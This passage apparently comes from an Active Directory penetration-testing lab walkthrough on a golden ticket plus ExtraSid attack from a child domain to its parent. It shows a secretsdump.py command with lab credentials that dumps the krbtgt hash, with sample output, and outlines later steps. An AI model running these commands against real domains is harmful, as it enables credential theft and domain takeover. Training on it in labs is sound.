Golden ticket + ExtraSid

  • We have done the exploitation on one command with impacket raiseChild.py, now let’s just do the same but step by step and create the golden ticket.

  • Full explanation on the attack can be found here : https://adsecurity.org/?p=1640

  • First dump the krbtgt of the domain we own

# dump child ntds and get krbtgt NT hash
secretsdump.py -just-dc-user north/krbtgt \ 
 north.newyork.local/fernando.alonzo:'IDr1R3allyF@sTF1!'@192.168.56.11

...
krbtgt:502:aa3b435b51404eeaad3b435b51404ee:13354bc6e1b48fff8d66a2090e909b27:::
..
  • Now get the child and parent domain SID

Get SID for north.newyork.local

Get SID for NewYork.local

The task for you is to add the ccname and do a -no-pass like we have done before :)

  • And we use the ticket to dump the parent domain NTDS

Last updated